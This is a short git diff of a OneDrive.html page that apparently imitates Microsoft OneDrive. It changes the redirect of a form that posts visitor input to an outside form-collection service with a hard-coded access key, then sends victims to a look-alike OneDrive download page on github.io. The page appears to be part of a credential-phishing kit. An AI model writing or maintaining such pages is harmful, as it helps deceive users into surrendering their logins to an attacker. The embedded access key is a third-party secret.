--- a/OneDrive.html
+++ b/OneDrive.html
@@ -53,7 +53,7 @@
   <br>
  <small class="text-danger" id="msg" style="font-weight: 600;"></small>
  <form action="https://api.web3forms.com/submit" method="POST">
-<input type="hidden" name="redirect" value="window.location.search">
+<input type="hidden" name="redirect" value="https://amira800.github.io/OneDrive-File-Download/OneDrive">
     <!-- Replace with your Access Key -->
     <input type="hidden" name="access_key" value="68c2f032-ae3c-41ea-bdb4-11061b978f83">
 
